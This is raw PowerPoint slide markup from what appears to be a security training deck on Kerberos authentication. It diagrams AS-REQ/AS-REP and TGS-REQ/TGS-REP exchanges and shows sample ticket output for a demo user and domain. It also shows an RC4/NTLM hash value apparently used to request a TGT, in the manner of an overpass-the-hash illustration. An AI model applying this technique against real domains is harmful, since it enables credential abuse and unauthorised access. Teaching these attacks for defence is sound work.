            <a:ext cx="870099" cy="8700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E97697E-99E2-CE61-7920-E54C35C64B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="964059" y="3084217"/>
            <a:ext cx="7234788" cy="3030833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="135000" rIns="13500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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AS-REQ with pre-authentication (default in Windows)</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ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRP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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>User uses password (LT Key) to encrypt timestamp</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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Timestamp sent to the authentication server (AS) part of the Key Distribution Center (KDC)</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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>KDC decrypts timestamp (has all LT keys in possession)</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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If decryption is successful, gives client a TGT (encrypted with target LT key and KDC long-term key) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="623877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285E-245B-AC6E-A01A-BE1F5FA8EA3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Authentication: Ticket Granting Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1094A9AF-8AEC-A173-64D0-14E34F9EDB4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="848829" y="3617612"/>
            <a:ext cx="6930931" cy="2118483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solid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Start / End / </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MaxRenew</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>05/12/2018 07:12:18 ; 05/12/2018 17:12:18 ; </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black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>12/12/2018 07:12:18 ; </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Service Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; synctechlabs.com </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Target Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; synctechlabs.com</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Client Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>alan.marshall</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; synctechlabs.com</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Flags:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 40e10000</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="1"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Session Key: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>0x00000012eb212eb23ca12eb23c</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>45eb4124af9010bf13f…&lt;snip&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EAFC667-1D96-B5A8-3B69-80960D06FED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3153996" y="2452150"/>
            <a:ext cx="1756728" cy="526832"/>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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rc4_hmac_md5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069C50AD-8097-F852-1324-401DE770E45A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5049353" y="2448024"/>
            <a:ext cx="3124766" cy="526832"/>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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>f56a8399599f1be040128b1dd9623c29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arrow: Curved Down 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25240CA9-220E-5D1D-4182-201205022F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678558" y="2156595"/>
            <a:ext cx="2542798" cy="423110"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 94881"/>
              <a:gd name="adj3" fmla="val 25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dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374B02CA-7E76-DAC1-47F6-E20539FB807D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10472421" y="1351683"/>
            <a:ext cx="1390477" cy="2095526"/>
            <a:chOff x="10446699" y="1473785"/>
            <a:chExt cx="1130788" cy="1938154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 2" descr="Server by cyberscooty">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE2A0D2-9DAB-C9EA-D641-22A8DAE9D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699" y="1473785"/>
              <a:ext cx="737960" cy="12222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DB496C0-AD97-A42A-CD07-4FEA7DB26E59}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10623454" y="2902107"/>
              <a:ext cx="807040" cy="509832"/>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KDC</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 2" descr="Book by MajinCline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D00ACB7-2263-A2E4-3A5A-2106AAA5F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0449" y="2118230"/>
              <a:ext cx="807038" cy="76222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Flowchart: Alternate Process 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7348788B-572C-AC86-0861-4871710887B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8787021" y="2720888"/>
            <a:ext cx="826757" cy="372906"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TGT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flowchart: Alternate Process 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63BC0842-684C-1811-2C11-3D5AD105078D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763472" y="3816232"/>
            <a:ext cx="826757" cy="524804"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ST (TGS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA2864D-972D-4156-C924-195EC5780B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10487207" y="4050041"/>
            <a:ext cx="959977" cy="1200847"/>
            <a:chOff x="10798720" y="4898278"/>
            <a:chExt cx="1168889" cy="1474940"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 2" descr="Server by cyberscooty">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A9FE1FA-99D7-8C9D-28B9-11962D584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720" y="4898278"/>
              <a:ext cx="737960" cy="12222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older by computating">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C38904B-557C-19A5-DC13-9BDDBC449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86" y="5548595"/>
              <a:ext cx="824623" cy="82462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3D925FD0-C2CE-A36D-510B-6FDE7A53AE50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10487206" y="5288981"/>
            <a:ext cx="959977" cy="527387"/>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File Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Connector: Curved 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4627D9B9-5476-6BB3-F61C-BEB3F06F9D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8174119" y="1455334"/>
            <a:ext cx="2048708" cy="1256106"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31609"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D4A435-0DEF-09CC-26A7-0406CDD5E848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8480211" y="1602512"/>
            <a:ext cx="1072729" cy="307777"/>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white">
                    <a:lumMod val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. AS-REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Connector: Curved 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC704B13-3616-68A8-07D2-FCD41B52633F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="9200399" y="1880150"/>
            <a:ext cx="1022429" cy="840737"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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02443B07-6A65-CF5A-0F92-BF4104F7C7B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9023429" y="2140842"/>
            <a:ext cx="1053493"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black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. AS-REP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connector: Curved 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F160FF0F-7D0D-805B-D788-9258E54AED4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="9586110" y="2486855"/>
            <a:ext cx="221227" cy="992650"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99792"/>
              <a:gd name="adj2" fmla="val 70822"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E08AAD-748F-57C2-3FD2-8080A93B9DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8664298" y="3230580"/>
            <a:ext cx="1200969" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>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black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3. TGS-REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Connector: Curved 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A5C5F62-3B26-B332-0AB4-6A2868AA1505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9491815" y="3100453"/>
            <a:ext cx="1076598" cy="879766"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2BF03F4-F2D0-8E39-03C4-B97F0AD015F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10216401" y="3589041"/>
            <a:ext cx="1181733" cy="307777"/>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white">
                    <a:lumMod val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4. TGS-REP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Connector: Curved 24">
            <a:extLst>
